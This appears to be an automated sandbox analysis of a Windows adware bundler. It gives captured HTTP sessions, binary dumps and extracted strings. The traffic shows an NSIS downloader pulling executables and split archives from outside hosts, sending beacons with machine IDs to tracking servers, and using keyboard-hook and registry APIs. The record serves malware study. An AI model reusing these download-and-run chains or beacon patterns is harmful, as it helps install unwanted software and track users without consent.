M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /sdk/binsis/2.2/BiTool.dll HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d27foqb3kkzkt9.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 59904

Connection: keep-alive

Server: nginx

Date: Thu, 23 Jul 2015 01:04:56 GMT

Last-Modified: Tue, 15 Oct 2013 19:55:30 GMT

ETag: "525d9db2-ea00"

Expires: Thu, 23 Jul 2015 01:14:56 GMT

Cache-Control: max-age=600

Accept-Ranges: bytes

Age: 111

X-Cache: Hit from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Wly0idpS8MatCKxKUY8_mR9gi0IR9j6CuMgSs-wgEzo2PspQXgq0zA==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I}.I..h...h...h..S....h..d....h..d....h..d....h..d....h...i.W.h..d....h..d....h..d....h.Rich..h.................PE..L.....]R...........!.........,......e........................................ ......9.....@.....................................................................0...................................`...@...............H............................text..._........................... ..`.rdata..5...........................@..@.data...x...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................U..Q.M..E..M....E...]...........U..Q.M..E.....].U..Q.M...]......U..Q.M..E........E...]..........U..Q.M..E..M.......]............U......M..E..8.t..M.........E....E......E...]...U..Q.M..E..M...3.;......].......U..Q.M..E.3..8........].........U..Q.M..E.P.M........M........E...].............U..Q.M..E........M.........]....U..Q.M..M.......E....t..M.Q.Z.......E...].......U...E.].........U..j.h....d.....PQ.....3.P.E.d......M..M........E......E........M.Q.M...........E......E..M.d......Y..].........U..Q.M..E.......

<<< skipped >>>

GET /data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=8819 HTTP/1.1

Accept: */*

Host: logs.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:58:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1443214692.dop012.fr7.t,1443214692.cds020.fr7.c

GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Fri, 25 Sep 2015 20:58:12 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1443214692.dop012.fr7.t,1443214692.cds020.fr7.c..GIF89a.............,...........D..;..

GET /installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2919 HTTP/1.1

Accept: */*

Host: mystats.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: 280T/EtK73K0JshNYAESQRraEL7QBHnCC5l7hiVFm8Q9BUU8F1NBWYW8mM8Oh4fTvZ2ub bcOHY=

x-amz-request-id: 4A2DCEF8ABFA75DD

Date: Fri, 25 Sep 2015 20:58:14 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 280T/EtK73K0JshNYAESQRraEL7QBHnCC5l7hiVFm8Q9BUU8F1NBWYW8mM8Oh4fTvZ2ub bcOHY=..x-amz-request-id: 4A2DCEF8ABFA75DD..Date: Fri, 25 Sep 2015 20:58:14 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..

GET /crossbrowse/ie/107/ie.zip.002 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:58:13 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008912"

Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT

Cache-Control: max-age=47138

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1443214693.dop003.fr7.t,1443214693.cds004.fr7.c

.R...rf..ol......}>....]..m..sr!..m..Mu..v....\..F.....R...[y8...6...7...h.K.52.'.m];."......;........6.Q.Li.T[...<.....P..SJGtW....~......&.{h.X.;<.x...........iX..........qda.....P....6X.....@.(........... .....!E..t......-O..n..z..N.....4s....=0...xa.o....Q..P....z..oNiC. ...{..B.~..B..o.4...UO[.T....Y..f..*..G......h.1...B.I..1...;..3....(...;..M..Q.5..,F.._..$#..K.(..&...Y...O.Q(.>O......UP.<?2_... .%.D..*.H..y...5..U7.#.....J 7.8b...f.r64h.g ....'y.m..M.fW...e..Y.SG..D...a.h..auwR......v......_.s<E.O......Y..n-..hT..p.$J.`>......-...9.2.Is..5...v.~%{b.H.d).......w..m5......X..v~..!.:.K..xEzE...J...V....It..C6...~V6%...uG..bW...........)}..m..|nh..............wB;.M>.E.h..E0..9.....F.ew....J.J......_*4....*{..V(z..}q........u.:tfT...G9'....6......8.....h..r...`s/..kw.H.~...E..r_!.A.U....kbn......2..m]T&&.....p.p,6_.....~........;V.......:.....MI.Vs..'.(..@...B...S...O...<....q.IG....wB$.......Q.&.....4...{^....g..L...e8...b..(n.B<..b5...o......"......!.G.....m^......2.:...^...1xd[..h.^...I...c~.h.....Q.3tv"^k....!.G...d........=:.....5`a....ab$.r'3..:...l..&.d@p...P"..7..w..@.F:.x...o..j..W...%...Cz?.Np......~....GFP ;..Z.......2.~8....R...s......//.7.....l.U>....r.....{0.Gs:......`.pm......_{.".........#d..")..o..-.... ...E.J.....}.XhH;h...4j. ..E..3]g..9.!..T...``r.hwhEbP......L..S/Is|5..`....}|W(...8E76..7...*.l....Wuw....2.....cO..)4c..=X9..zwT...i.`..Rh.......ST.zLL.9..V.}<..<....5.>\H..,...(.l....q>..i2<~.E.F.....b.......\.....j1W.Q...o\s..}.<....$^w.

<<< skipped >>>

GET /data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8567 HTTP/1.1

Accept: */*

Host: logs.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:58:38 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1443214718.dop006.fr7.t,1443214718.cds020.fr7.c

GIF89a.............,...........D..;..

GET /crossbrowse/ie/107/ie.zip.001 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:58:13 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008912"

Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT

Cache-Control: max-age=47125

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1443214693.dop005.fr7.t,1443214693.cds027.fr7.c

PK........l..G...nd.T.d.T.....chrome.packed.7z7z..'.....T...T.............*..F......8%D.cT(g.....,r...E^<5....S$<....Z..*...7&.o.,.a&......%...1..5...m...h..=w.|.a.a.Q.{.<..:..9Q,>n...k.....~..aJ.._...KD.V...7.>..3....d......)..6.H..RN...:.....FU.!..j...9....L.&.2.a........ .E.s'T.......vD.z)..}..-.. .&.vF}.$.z.......lw.>..!...'.a..|...L....09E..Y8^.s.O\..C..%.......d.VD....W..d.'..6%...l.7Gk.<..I...5...d !......wT...d...H..7v.E.......{.p.]`.......~w84.rj......;...).q.k..G...........zL...{....>.."........"q..k[.f...F{8...s..c>[69..|...q].(.S..~..1z..>.!AT&i.}....YJ....\i....o..(...4.5.......h|.......6.!...4.p[....@.m.. ^&...A..&E..V.]...T=.v]W.l=A=y.T....R.'f.....60..MR...k...c.1."..jw.7C.N...b....@...@....%..%*!5............iW*y..*......E...D....6....3.P....2.....} .'..!...cG.m...Z.]%{.QZ./e.V-C.a.X.aQ?.....S..1...:.T..C*..hKH....(...aH.r..;..^.l.ikR.X..8..._...^T{B@..'.tga.3."..<. ...........$c9......... .~)/..%.2{...X&.W.....>...bh.L.....U.-.Vf......r..d..9. ..k.'.M...J...v...rU..`3...SWX...G1.`....{.....8.~..x..Q...g.._...1.9.......f8..#p..............]...E.(....J....(H.h..6@'.hc.5....}.1>{..6/.R.....(X.k.<....\.....:p...u..L.....h...K...vaK./.O........'|...8..2...{..9....."&.......Z..K.eJ..4e..)v..[...J$.e........5.G......X..@.o.^Y...%....._.n.:...\......H...0,.f.E...*M.F.f.R.lJ*,...S.....FE*'b.#V.@........a=._.....W... .}.....p.~..(>.....E.1k....3k....F..[.T...,N...............Y7.......G[....rH).E......[.5..K..Q..J#8.-.@.]<eh........2a.c.8...Z....O.....z..2c

<<< skipped >>>

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_FIN HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:59:09 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Fri, 25 Sep 15 20:59:00 GMT

Set-Cookie: _c4aid=5E7A8A956FF4495188A597C64EC21ECF; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=5E7A8A956FF4495188A597C64EC21ECF,1443214749.45672; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..

GET /download/dwn/prq4633/este/re/setup_gmsd_re.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: dl.taxideataxus.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:58:55 GMT

Server: Apache/2.2.16

Last-Modified: Fri, 25 Sep 2015 15:36:08 GMT

ETag: "230017b-586f10-520941b43c8d4"

Accept-Ranges: bytes

Content-Length: 5795600

Keep-Alive: timeout=15, max=200

Connection: Keep-Alive

Content-Type: application/x-msdos-program

MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................0........X..........@..............................P.......(........... cX.............................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...(...........................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.

<<< skipped >>>

GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: prof.eorezo.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:59:00 GMT

Server: Apache/2.2.22

x-eorezo-crc32: -1

x-eorezo-crypted: 1

x-eorezo-length: 357

Set-Cookie: conftime=1443214740; expires=Wed, 19 Jan 16 14:45:00 GMT; domain=eorezo.com; path=/;

Set-Cookie: EoRezo=194.242.96.218.1443214740985864; path=/; expires=Sun, 25-Oct-15 20:59:00 GMT

Connection: close

Transfer-Encoding: chunked

Content-Type: text/plain

1ec..Xg8nssf/4H10OdRv/PBlQCyF9RkAzpy/PPG8paJnu rCw3mAaqFpX2 ZKEgbMMA2htCshaMIPoMPkSppoNIfvqD ZyWxTIl1LyUx8yWjlHHNhn1WF5uF0H6qLM uZMwkTiGldZX5iSj uCsroOrbj/qdFgfbU9hmNOF2lZWiRA4D1nmKWD56o30N03aMe cM TaH0Zt8tkkpVIrV86sjShA2ibI4frmimtvqttCmZq2iOlFsKeYNJxrj/jP12cx2lA7NiBrk4PKXXug7tpKb65atNqDRlvUKKAF9c9zPzn4F2eh8GAfVbPOtZhSf/o/50RLSfemcISdhtiO8gTINReeSoYdUAqhmbrscZPjwnJCjKfgrUbQCV1J0DBwv2J mQsGJZQH4xDticU8Aw3zUoh3vFhu1Wg3CUqlkPjaoTHwm7LcFgkhAy A9qiL9G3nGtxC4eGJD3HM29TeMBpi5wjFtJRirkgPWAr1gnD hmf0=..0..

GET /0.gif?2948573&101&101 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: sstatic1.histats.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:59:25 GMT

Content-Type: image/gif

Content-Length: 43

Connection: close

Set-Cookie: CountUid=a66b5300-f6pc-40d2-8fc4-e2443c4c6a10; domain=.histats.com; Max-Age=31536000; Expires=Sat, 24-Sep-2016 20:59:25 GMT

GIF89a.....

GET /crossbrowse/ie/107/ie.zip.005 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:58:13 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008913"

Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT

Cache-Control: max-age=47125

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1443214693.dop003.fr7.t,1443214693.cds036.fr7.c

[..Wa<.3.......Y.}S.Q)|.x.P..r._ip`...h.r...@..k.....8..o.D_C.0.h..M...gv......J..g.....a.4..~....A.Y.. .u:7..... i...$.....p...ORP.P... ....._.@......?.F.....8.@..l....{n...XGi......2..........FOqM..N_.}...S*he.I.q.. ..V...=.E....1....M.S.......f3%.?.....Ug.\.}...I..g..w..[....t..yR..DJ3.;.;W...._.....y.:..XZ<..40a.I..A...vUW..,...u"......>..*.....@D...YX.4.......v]...T.$..T.1...2.X..o.X....@.%...n.LL....-..A...n.......uq<.r$..t`M.:c9C..l./....}2.......{.O...7............;...M..x...rwqL.\.. ..b.........*f!..S|..*g...'dl..........eN..km...:.6.....s....n.5..0_r8 D.W...".S/%r.rU..c.......C.v5..C...3..z....\.B.-a..r......|..G..W.....2h..>jSy....Z.........tE...T....R.2...p..Q>...f.fj.#.Z.l....7..h.....>...-..K...<....?....B..........,.....$..~........^..V...Uq.672kCC......i....J....*...K.......0..14....{.Wwf".K.p....;.6.H."6y.q.E~. i.`...hN.....d../\A....hY.$!}3..7.*&.n......Z...Q>W.......`0.q..M..A@*.Y 0..7l"m......0...4..X2.|.C2j.[..K...gu...?.a..s.B.kX......j.t...B@|d.l._.zZ.. ."D(..PD..l?.%..w.....).v,v9m...w........G..C.SU.l7*JlW.....56.....v..{............G..3..0....R......Y.h,u..k.'.....$..&.[.9.. 8..1..DZF....n......l_.......*.R...Q$.3.q\..'...]...k..*..0....^#.|A.v...K...........T.Q.#...^e.c....V\..ysD.Ai^.ly..P.~..lreD.g_.Q.....i..kS.R...f..=9.9..q=D."......-N...C.....%.-..u.....<.qj..:..s......:>.I`.PJ..vQ.K.....o.)qew.K.G....w.....tJ.a4...L.[.......0.0#.),......7....J}*..^`w..Q.h...~e..Ql..*..|}...K.Z.*..'.....|..rp.@_.b..!..R.%....%..m"....W9..$ 1.......VZ..''.1,|..V...

<<< skipped >>>

GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.software-forus.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:58:34 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1442816573"

Last-Modified: Mon, 21 Sep 2015 06:22:53 GMT

Cache-Control: max-age=34604

Content-Length: 104354

Content-Type: application/octet-stream

X-HW: 1443214714.dop004.fr7.t,1443214714.cds007.fr7.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@.....................................................................................8............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata... ...p...........................rsrc...8...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_DCOUNT1 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:59:09 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Fri, 25 Sep 15 20:59:00 GMT

Set-Cookie: _c4aid=F47F5BE0A6D640F38FCF6DA2C84845B5; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=F47F5BE0A6D640F38FCF6DA2C84845B5,1443214749.79177; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..

GET /smt.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d10huri5h4o4a3.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-msdownload

Content-Length: 211114

Connection: keep-alive

Date: Fri, 14 Aug 2015 19:47:15 GMT

Last-Modified: Wed, 25 Feb 2015 18:08:27 GMT

ETag: "20f288aa7d995a4bfcb240b66383ebf4"

Accept-Ranges: bytes

Server: AmazonS3

Age: 50853

X-Cache: Hit from cloudfront

Via: 1.1 a436b6df4b0d1bd189edf722b5d2a523.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 1pUN6pxltkqUUrxxYlD9n-AUrykekAFJFJyIGEzYXit12UU-XkDQRA==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t....... ...f...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...0...............................rsrc....f... ...h...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /policyname.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d10huri5h4o4a3.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-msdownload

Content-Length: 81086

Connection: keep-alive

Date: Fri, 25 Sep 2015 20:15:12 GMT

Last-Modified: Fri, 25 Sep 2015 20:08:45 GMT

ETag: "37c03079fb3d206e4112f9aa52c41524"

Accept-Ranges: bytes

Server: AmazonS3

Age: 2649

X-Cache: Hit from cloudfront

Via: 1.1 a436b6df4b0d1bd189edf722b5d2a523.cloudfront.net (CloudFront)

X-Amz-Cf-Id: KWkPApmJG8gWHy7_S65EdZGhf-QXiysjAjPfEn-uWxprYhSqMmohog==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@...........................!..............................................t........!..............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc.........!......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

Map

The SpyTool connects to the servers at the folowing location(s):

Strings from Dumps

upgmsd_re_005010096.exe_1928:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

RSSSSSSh

RSSSSSSh

QSShh

QSShh

tFHt:Ht.Ht"Hu`

tFHt:Ht.Ht"Hu`

SSSShp

SSSShp

SSSSh

SSSSh

u$SShe

u$SShe

tWSShW

tWSShW

tl9_ tgSSh

tl9_ tgSSh

t'SShl

t'SShl

SSSShxjn

SSSShxjn

j%XtL9E

j%XtL9E

FtPW

FtPW

SSh@B

SSh@B

u.SSh

u.SSh

tsSSh

tsSSh

FTCP

FTCP

t.WWWSP

t.WWWSP

tAHt.HHt

tAHt.HHt

FTPS

FTPS

u)SShF

u)SShF

s%j.Zf

s%j.Zf

xSSSh

xSSSh

FTPjKS

FTPjKS

FtPj;S

FtPj;S

C.PjRV

C.PjRV

operand of unlimited repeat could match the empty string

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

POSIX named classes are supported only within a class

erroffset passed as NULL

erroffset passed as NULL

POSIX collating elements are not supported

POSIX collating elements are not supported

this version of PCRE is not compiled with PCRE_UTF8 support

this version of PCRE is not compiled with PCRE_UTF8 support

PCRE does not support \L, \l, \N, \U, or \u

PCRE does not support \L, \l, \N, \U, or \u

support for \P, \p, and \X has not been compiled

support for \P, \p, and \X has not been compiled

(*VERB) with an argument is not supported

(*VERB) with an argument is not supported

!"#$%&'((()* ,-./01

!"#$%&'((()* ,-./01

CNotSupportedException

CNotSupportedException

CCmdTarget

CCmdTarget

RegOpenKeyTransactedW

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyTransactedW

CFtpFileFind

CFtpFileFind

CHttpConnection

CHttpConnection

CFtpConnection

CFtpConnection

CHttpFile

CHttpFile

RegDeleteKeyExW

RegDeleteKeyExW

TaskDialogIndirect

TaskDialogIndirect

CMDITabProxyWnd

CMDITabProxyWnd

CMDIChildWndEx

CMDIChildWndEx

CMDIFrameWndEx

CMDIFrameWndEx

CMDIChildWnd

CMDIChildWnd

CMDIFrameWnd

CMDIFrameWnd

CMDIClientAreaWnd

CMDIClientAreaWnd

CHotKeyCtrl

CHotKeyCtrl

CMFCToolBarsKeyboardPropertyPage

CMFCToolBarsKeyboardPropertyPage

GetProcessWindowStation

GetProcessWindowStation

operator

operator

portuguese-brazilian

portuguese-brazilian

qR.Rd

qR.Rd

Visual C CRT: Not enough memory to complete call to strerror.

Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

%%X

%%X

RegSetKeySecurity error! (rc=%lu)

RegSetKeySecurity error! (rc=%lu)

Key not found.

Key not found.

Error opening key.

Error opening key.

ntdll.dll

ntdll.dll

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

LookupPrivilegeValue error: %u

LookupPrivilegeValue error: %u

Error %d: Could not begin update of %s

Error %d: Could not begin update of %s

Error %d: Updating resource

Error %d: Updating resource

!"#$%&'()* ,-./:;?@[\]^_`{|}~

!"#$%&'()* ,-./:;?@[\]^_`{|}~

C:\appbuilder_2.0_multiinstall\Release\temp.pdb

C:\appbuilder_2.0_multiinstall\Release\temp.pdb

IPHLPAPI.DLL

IPHLPAPI.DLL

PSAPI.DLL

PSAPI.DLL

GetProcessHeap

GetProcessHeap

GetWindowsDirectoryW

GetWindowsDirectoryW

GetCPInfo

GetCPInfo

KERNEL32.dll

KERNEL32.dll

GetKeyState

GetKeyState

SetWindowsHookExW

SetWindowsHookExW

CreateDialogIndirectParamW

CreateDialogIndirectParamW

UnhookWindowsHookEx

UnhookWindowsHookEx

MsgWaitForMultipleObjectsEx

MsgWaitForMultipleObjectsEx

GetAsyncKeyState

GetAsyncKeyState

MapVirtualKeyW

MapVirtualKeyW

GetKeyboardLayout

GetKeyboardLayout

GetKeyboardState

GetKeyboardState

GetKeyNameTextW

GetKeyNameTextW

MapVirtualKeyExW

MapVirtualKeyExW

EnumChildWindows

EnumChildWindows

USER32.dll

USER32.dll

GetViewportExtEx

GetViewportExtEx

SetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

SetViewportExtEx

ScaleViewportExtEx

ScaleViewportExtEx

GetViewportOrgEx

GetViewportOrgEx

GDI32.dll

GDI32.dll

MSIMG32.dll

MSIMG32.dll

COMDLG32.dll

COMDLG32.dll

WINSPOOL.DRV

WINSPOOL.DRV

RegLoadKeyW

RegLoadKeyW

RegUnLoadKeyW

RegUnLoadKeyW

RegOpenKeyExW

RegOpenKeyExW

RegCloseKey

RegCloseKey

RegCreateKeyExW

RegCreateKeyExW

RegSetKeySecurity

RegSetKeySecurity

RegDeleteKeyW

RegDeleteKeyW

RegEnumKeyExW

